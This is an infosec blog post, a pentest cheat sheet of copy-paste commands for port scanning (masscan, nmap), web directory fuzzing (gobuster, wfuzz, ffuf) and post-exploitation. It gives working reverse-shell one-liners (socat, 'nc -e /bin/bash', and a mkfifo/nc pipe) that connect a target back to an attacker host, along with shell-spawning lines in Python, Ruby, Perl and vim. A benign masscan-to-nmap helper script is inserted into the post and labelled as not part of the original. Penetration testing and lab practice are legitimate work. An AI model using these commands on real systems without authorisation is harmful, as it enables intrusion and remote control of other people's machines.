bt0

Blogging about InfoSec

9 January 2020

Pentest Cheat Sheet

by bt0

tags: infosec - pentest - recipes

A collection of commands I use frequently (for reference and CTRL+C / CTRL+V).

Port Scanning

- masscan -e tun1 -p1-65535,U:1-65535 10.10.10.1 --rate=500
- nmap -e tun1 -n -v -Pn -p22,80 -A --reason -oN nmap.txt 10.10.10.1
- nmap -sSV --version-all --min-parallelism 64 --script=vuln 10.10.10.1 -Pn -n
- nmap -sV -sC -sT 10.10.10.1
- nmap -sV --script "*vuln*" -p- 10.10.10.1   (quote the pattern so the shell does not glob it)
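The usual workflow behind the two tools above is masscan for the fast full-range sweep, then nmap with -A only on the ports masscan reported (as in the -p22,80 line). The helper below, added here and not part of the original post, turns masscan's -oL list output into the -p argument nmap expects, splitting TCP and UDP into T:/U: groups and deduplicating. It assumes masscan was run with -oL (lines of the form "open tcp 22 10.10.10.1 <timestamp>"); the sample data is constructed, not real scan output.

```shell
#!/bin/sh
# Convert masscan list output (-oL) into an nmap -p port specification.
#   input lines: open tcp 22 10.10.10.1 1578093453
#   output:      T:22,80,8080,U:161
masscan_to_nmap_ports() {
  # keep only "open" records, emit "<proto> <port>", dedupe and sort numerically per protocol
  awk '$1 == "open" && ($2 == "tcp" || $2 == "udp") { print $2, $3 }' "$@" |
  sort -u -k1,1 -k2,2n |
  awk '
    function join(a, n,   i, s) { s = a[1]; for (i = 2; i <= n; i++) s = s "," a[i]; return s }
    $1 == "tcp" { tcp[++nt] = $2 }
    $1 == "udp" { udp[++nu] = $2 }
    END {
      out = ""
      if (nt) out = "T:" join(tcp, nt)
      if (nu) { if (out != "") out = out ","; out = out "U:" join(udp, nu) }
      print out
    }'
}

# Constructed sample of masscan -oL output (assumption: this is what the sweep found).
sample_masscan_list() {
  cat <<'EOF'
#masscan
open tcp 80 10.10.10.1 1578093453
open tcp 22 10.10.10.1 1578093454
open udp 161 10.10.10.1 1578093455
open tcp 8080 10.10.10.1 1578093456
open tcp 22 10.10.10.1 1578093457
# end
EOF
}

# Usage: feed the result straight into nmap, e.g.
#   nmap -e tun1 -n -v -Pn -sS -sU -p "$(masscan_to_nmap_ports scan.txt)" -A --reason -oN nmap.txt 10.10.10.1
sample_masscan_list | masscan_to_nmap_ports
```

Note that nmap only honours a U: group when a UDP scan (-sU) is also requested; with a plain -sS/-sT scan the UDP ports are ignored.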

Some Fuzzing Things

Gobuster

- gobuster dir -w some-wordlist.txt -x php -e -u http://10.10.10.1/ --timeout 30s

wfuzz

- wfuzz -w some-wordlist.txt --hc '403,404' http://10.10.10.1/FUZZ
- wfuzz -c -z file,wordlist.txt -z file,wordlist2.txt --hc 404 http://10.10.10.1:8080/FUZZ/FUZ2Z

ffuf (faster)

- ffuf -c -w some-wordlist.txt -u http://10.10.10.1/subdir/FUZZ

Reverse Shell

Socat

On Attacker: socat file:`tty`,raw,echo=0 tcp-listen:4445
On Target:   socat tcp-connect:10.10.15.1:4445 exec:sh,pty,stderr,setsid,sigint,sane

Netcat (with -e support)

On Attacker:    nc/netcat -l -n -v -p 4445
On Target:      nc/netcat -e /bin/bash <attacker_IP> <Attacker_Port>

Netcat (without -e)

On Attacker:    nc/netcat -l -n -v -p 4445
On Target:      rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc/netcat 10.0.0.1 4445 > /tmp/f

Spawning a Shell

Python

- python -c 'import pty; pty.spawn("/bin/bash")'
- python3 -c 'import pty; pty.spawn("/bin/bash")'

Ruby

- ruby -e 'exec "/bin/sh"'
- (inside irb or a Ruby script) exec "/bin/sh"

Perl

- perl -e 'exec "/bin/sh";'
- (inside a Perl script) exec "/bin/sh";

From vi or vim

- :!bash
- :!/bin/bash